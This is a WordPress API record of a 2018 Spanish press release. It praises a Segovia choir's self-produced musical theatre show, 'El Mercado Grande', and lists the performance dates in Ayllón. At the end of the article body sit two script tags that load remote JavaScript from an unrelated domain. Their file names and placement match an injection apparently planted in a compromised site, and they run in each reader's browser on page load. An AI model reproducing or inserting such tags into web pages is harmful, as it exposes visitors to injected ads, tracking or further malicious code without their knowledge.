{"id":250,"date":"2018-08-02T09:32:43","date_gmt":"2018-08-02T09:32:43","guid":{"rendered":"http:\/\/www.bandopress.com\/notas-de-prensa\/?p=250"},"modified":"2018-08-02T09:32:43","modified_gmt":"2018-08-02T09:32:43","slug":"el-mercado-grande-una-evocacion-del-pasado-con-aires-de-recuerdo","status":"publish","type":"post","link":"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/08\/02\/el-mercado-grande-una-evocacion-del-pasado-con-aires-de-recuerdo\/","title":{"rendered":"El Mercado Grande. Una evocaci\u00f3n del pasado con aires de recuerdo"},"content":{"rendered":"<p><strong>Gran \u00e9xito de p\u00fablico y cr\u00edticas al espect\u00e1culo de teatro musical EL MERCADO GRANDE producido \u00edntegramente por la Coral la Espada\u00f1a de Ayll\u00f3n en Segovia<\/strong><\/p>\n<p>Los retos que se plantea la Coral la Espada\u00f1a de Ayll\u00f3n est\u00e1n siempre en busca de la motivaci\u00f3n del colectivo. En esta ocasi\u00f3n, nos encontramos con un proyecto que rompe los esquemas de cualquier agrupaci\u00f3n coral al uso, y que para la Espada\u00f1a de Ayll\u00f3n no es novedad, puesto que en el a\u00f1o 2016 llev\u00f3 a cabo el montaje teatral LA TABERNA .<\/p>\n<p>Habiendo sido capaces de interpretar obras contempor\u00e1neas de hasta ocho voces, con obras de gran dificultad arm\u00f3nica, en esta ocasi\u00f3n se han planteado, con gran \u00e9xito de p\u00fablico y cr\u00edticas la interpretaci\u00f3n del MERCADO GRANDE, una obra de creaci\u00f3n propia que integra la m\u00fasica vocal del renacimiento y del folclore tradicional segoviano, con la historia de los mercados de la \u00e9poca, junto con historias que emocionan y atrapan al espectador.<br \/>\nCada uno de los miembros de la coral, un total de 32 participantes, tiene una responsabilidad y un lugar en dicho proyecto. Actores, m\u00fasicos, cantantes, dise\u00f1o de folleto y carteler\u00eda, t\u00e9cnicos de luces y sonido, vestuario, escenograf\u00eda, atrezzo y difusi\u00f3n, entre otros, son \u00edntegramente asumidos por la asociaci\u00f3n.<\/p>\n<p>Con el aforo completo en su estreno, en la celebraci\u00f3n de la famosa fiesta de AYLL\u00d3N MEDIEVAL, se realizar\u00e1n tres representaciones el fin de semana 3, 4 y 5 de agosto, con un aforo limitado, en el enclave \u00fanico de la Iglesia de San Miguel a las 21 horas.<\/p>\n<p>El reto de EL MERCADO GRANDE de producci\u00f3n propia con la direcci\u00f3n musical y arreglos de muchas de las obras de mano del director segoviano Rub\u00e9n Cid y los guiones y direcci\u00f3n esc\u00e9nica de Mariana Sanz, ha hecho dar al colectivo un paso m\u00e1s hacia la interpretaci\u00f3n, que aunque no sea el objetivo principal y cotidiano de la coral, abre su punto de miras hacia nuevas artes.<\/p>\n<p>La Coral la Espada\u00f1a, activa durante todo el a\u00f1o, alimenta la cultura musical de todo el Nordeste de Segovia, con participantes de distintos lugares como son Riaza, Campo de San Pedro o Fresno de Cantespino. Su repertorio, a lo largo del a\u00f1o, es muy variado y en ocasiones complicado, trabajando de modo constante para conseguir resultados de gran valor.<\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>Gran \u00e9xito de p\u00fablico y cr\u00edticas al espect\u00e1culo de teatro musical EL MERCADO GRANDE producido \u00edntegramente por la Coral la Espada\u00f1a de Ayll\u00f3n en Segovia <a class=\"mh-excerpt-more\" href=\"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/08\/02\/el-mercado-grande-una-evocacion-del-pasado-con-aires-de-recuerdo\/\" title=\"El Mercado Grande. Una evocaci\u00f3n del pasado con aires de recuerdo\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":251,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-250","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-segovia"],"_links":{"self":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/250","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/comments?post=250"}],"version-history":[{"count":1,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/250\/revisions"}],"predecessor-version":[{"id":252,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/250\/revisions\/252"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media\/251"}],"wp:attachment":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media?parent=250"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/categories?post=250"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/tags?post=250"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}